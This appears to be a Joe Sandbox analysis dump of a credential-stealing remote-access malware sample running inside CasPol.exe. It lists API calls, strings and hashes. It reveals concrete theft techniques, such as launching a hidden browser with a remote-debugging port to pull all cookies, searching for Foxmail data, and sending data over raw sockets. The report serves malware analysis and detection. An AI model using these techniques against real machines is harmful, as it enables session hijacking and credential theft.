  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
• Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
• Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
• Sleep.KERNEL32(00000064), ref: 00412060
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$HDG$HDG$>G$>G
• API String ID: 1223786279-3931108886
• Opcode ID: 06025618dadcd7d40aa47030923b525a7e8dcdff4ba1033b0233db54cf45cc6a
• Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
• Opcode Fuzzy Hash: 06025618dadcd7d40aa47030923b525a7e8dcdff4ba1033b0233db54cf45cc6a
• Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A

Control-flow Graph: rendered graph not reproduced.
APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 04571434
  • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 04571137
  • Part of subcall function 045710F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571151
  • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457115C
  • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457116D
  • Part of subcall function 045710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457117C
  • Part of subcall function 045710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571193
  • Part of subcall function 045710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 045711D0
  • Part of subcall function 045710F1: FindClose.KERNEL32(00000000), ref: 045711DB
• lstrlenW.KERNEL32(?), ref: 045714C5
• lstrlenW.KERNEL32(?), ref: 045714E0
• lstrlenW.KERNEL32(?,?), ref: 0457150F
• lstrcatW.KERNEL32(00000000), ref: 04571521
• lstrlenW.KERNEL32(?,?), ref: 04571547
• lstrcatW.KERNEL32(00000000), ref: 04571553
• lstrlenW.KERNEL32(?,?), ref: 04571579
• lstrcatW.KERNEL32(00000000), ref: 04571585
• lstrlenW.KERNEL32(?,?), ref: 045715AB
• lstrcatW.KERNEL32(00000000), ref: 045715B7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: b09f43ea88173dcc2ff2e8e8733a30cbaeb126af30d0742761612dfa9c7dde67
• Instruction ID: ea26ba6f626c5803792fed86797aa9fdda715a209dafe9174ec84cad55d08e66
• Opcode Fuzzy Hash: b09f43ea88173dcc2ff2e8e8733a30cbaeb126af30d0742761612dfa9c7dde67
• Instruction Fuzzy Hash: 5A81A671A4036866EB20D7A0EC45FDE777DFF84704F0015AAF508E7190EAB16A85CF55

Control-flow Graph

APIs
• select.WS2_32(00000000,00000000,00000000,00000000,?), ref: 100086FE
• select.WS2_32(?,00000001,00000000,00000000,?), ref: 10008792
• recv.WS2_32(?,?,000005DC,00000000), ref: 100087C5
• WSAGetLastError.WS2_32 ref: 100087D2
• WSAGetLastError.WS2_32 ref: 100087DF
• send.WS2_32(?,?,?,00000000), ref: 1000885F
• WSAGetLastError.WS2_32 ref: 10008871
• WSAGetLastError.WS2_32 ref: 1000887A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ErrorLast$select$recvsend
• String ID: Connection closed!$Connection error!
• API String ID: 4255854023-2305758303
• Opcode ID: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
• Instruction ID: ed442c2dc6cb281fd35b63cc094b2b61bff5b4e8b3b3f7628600f1f37b8170a4
• Opcode Fuzzy Hash: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
• Instruction Fuzzy Hash: 56719272A0060AAFE704DF64CC89B59B7B8FF54380F548226E549D6A55DB70FA90CF90

Control-flow Graph

APIs
  • Part of subcall function 100076D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
  • Part of subcall function 100076D0: Process32FirstW.KERNEL32(00000000,?), ref: 10007744
  • Part of subcall function 100076D0: CloseHandle.KERNEL32(00000000), ref: 1000774F
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?), ref: 1000279E
• Sleep.KERNEL32(0000000A,100278DE,00000000,?,?,?,?), ref: 100028D2
• TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 10002A9D
• WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?), ref: 10002AAB
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABA
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABF
Strings
• localhost, xrefs: 1000296F
• --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
• localhost, xrefs: 10002A48
• {"id":2,"method":"Browser.close"}, xrefs: 10002A3B
• {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: CloseHandle$CreateProcess$FirstObjectProcess32SingleSleepSnapshotTerminateToolhelp32Wait
• String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$localhost$localhost${"id":1,"method":"Network.getAllCookies","params":{}}${"id":2,"method":"Browser.close"}
• API String ID: 3739829977-2677655338
• Opcode ID: a8493153503855f6f9aab56b26d4e52f0d5b721a9f897e61feb5301597870884
• Instruction ID: 11f8c4d24fe82a6f86681b1c4a37eeeb5123bf1d696f215f8944f13cdd62a5a1
• Opcode Fuzzy Hash: a8493153503855f6f9aab56b26d4e52f0d5b721a9f897e61feb5301597870884
• Instruction Fuzzy Hash: 7DC1E974D00248DEFF15DBA4DC85BEEBBB5EF05384F108159E40AA325ADB316E45CB62

Control-flow Graph

APIs
• connect.WS2_32(?,00F5D160,00000010), ref: 004042A5
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
• WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: 601579635915e11b10fdb855f4929282a74361c00447f006b68d65304df4c896
• Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
• Opcode Fuzzy Hash: 601579635915e11b10fdb855f4929282a74361c00447f006b68d65304df4c896
• Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

Control-flow Graph

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
• SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• closesocket.WS2_32(000000FF), ref: 0040481F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3658366068-0

Control-flow Graph

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
APIs
• PathFileExistsW.SHLWAPI(?), ref: 10006845
• PathFileExistsW.SHLWAPI(?), ref: 10006904
• PathFileExistsW.SHLWAPI(?), ref: 10006A19
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: Default$Default$Profile $User Data\Default$User Data\Profile $\Default
• API String ID: 1174141254-1565956251
Strings
• localhost, xrefs: 1000296F
• D, xrefs: 1000263C
• --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
• {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID:
• String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$D$localhost${"id":1,"method":"Network.getAllCookies","params":{}}
• API String ID: 0-36197314
APIs
• getaddrinfo.WS2_32(?,00000010,?,?), ref: 100085F0
• FormatMessageA.KERNEL32(000012FF,00000000,00000000,00000400,1002C4F0,00000400,00000000,?,00000010,?,?), ref: 10008613
• socket.WS2_32(?,?,?), ref: 10008659
• connect.WS2_32(00000000,?,?), ref: 1000866D
• closesocket.WS2_32(00000000), ref: 10008679
• FreeAddrInfoW.WS2_32(?), ref: 10008689
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: AddrFormatFreeInfoMessageclosesocketconnectgetaddrinfosocket
• String ID: getaddrinfo: %s
• API String ID: 1733616599-4118680637
                                                                                                                                                                                                                                  • Opcode ID: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                  • Instruction ID: ba985bc0003f028ac4b4e599035e3f0603eaa92aeb31a9206ee88384ba24f580
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E411E432A01614BBFB20DBA09C45F9E73A9FB44764F210619FB69A31D0C732BA168795
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100078AF
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 100078D1
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 100078DC
                                                                                                                                                                                                                                  • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 100079D8
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 100079EC
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 100079FA
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(?,0000022C), ref: 10007A1B
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 10007A2D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CloseHandleProcess32$CreateFindFirstNextProcessShowSnapshotThreadToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3779799082-0
                                                                                                                                                                                                                                  • Opcode ID: e52270b00a648155402b89675e6d7e062810d99c949bb7e50b232112364f9da3
                                                                                                                                                                                                                                  • Instruction ID: 2a0021c97947e2911aefd651af9cf86dd4725709f7f3ac61b73b067665f658f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e52270b00a648155402b89675e6d7e062810d99c949bb7e50b232112364f9da3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951A432E0022A9BEB21CFA4CC84BAEB7B5FF45794F214259DD19B7284D7345E42CB91
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                                                                  • API String ID: 3121278467-91888290
                                                                                                                                                                                                                                  • Opcode ID: 58e0756728f203ec97268b0f46e50b18b277bb6d4a0c3044900633d2ea456da7
                                                                                                                                                                                                                                  • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58e0756728f203ec97268b0f46e50b18b277bb6d4a0c3044900633d2ea456da7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                                                                                                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                  • API String ID: 782494840-2070987746
                                                                                                                                                                                                                                  • Opcode ID: 7198dbf691e5a7bb892ac66aa4501a564f66fafa71d7430043580709aebb250a
                                                                                                                                                                                                                                  • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7198dbf691e5a7bb892ac66aa4501a564f66fafa71d7430043580709aebb250a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(10021794), ref: 1002179D
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,10021794), ref: 100217EF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 10021817
                                                                                                                                                                                                                                    • Part of subcall function 100217BA: GetProcAddress.KERNEL32(00000000,100217AB), ref: 100217BB
                                                                                                                                                                                                                                    • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,100217AB,10021794), ref: 100217CD
                                                                                                                                                                                                                                    • Part of subcall function 100217BA: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,100217AB,10021794), ref: 100217E1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2099061454-0
                                                                                                                                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 12ea8003082ad6d35e98aca4d0b5426a3542ad57bdfd87ce099fb582a96701cb
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: DC012D1EA4928239AB11D6B43CC2AFB5FD8DB772E0BE00796F501C7093DDA1890693F1
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: CloseCreateValue
• String ID: HgF$pth_unenc
• API String ID: 1818849710-3662775637
• Opcode ID: bc9522044d74ced2922de2a73f5941ea9c6dfc645ce176e9e010a3a61b51447b
• Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
• Opcode Fuzzy Hash: bc9522044d74ced2922de2a73f5941ea9c6dfc645ce176e9e010a3a61b51447b
• Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
APIs
  • Part of subcall function 10007310: LoadLibraryW.KERNEL32(winhttp.dll,?,10002B6F), ref: 10007316
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 10007333
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 10007340
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 1000734D
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 1000735A
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 10007367
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 10007374
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 10007381
  • Part of subcall function 10007310: GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 1000738E
• GetLastError.KERNEL32 ref: 10002BF2
Memory Dump Source
